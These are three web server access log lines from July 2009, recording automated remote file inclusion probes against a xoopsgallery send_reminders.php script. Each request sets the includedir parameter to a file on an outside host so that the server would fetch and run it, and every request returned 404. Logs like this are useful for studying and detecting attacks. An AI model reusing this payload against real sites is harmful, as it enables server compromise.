217.174.254.143 - - [28/Jul/2009:06:44:49 -0400] "GET /xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
217.174.254.143 - - [28/Jul/2009:06:44:49 -0400] "GET /logs/access_log.Q109060100/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
217.174.254.143 - - [28/Jul/2009:06:44:49 -0400] "GET /logs/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
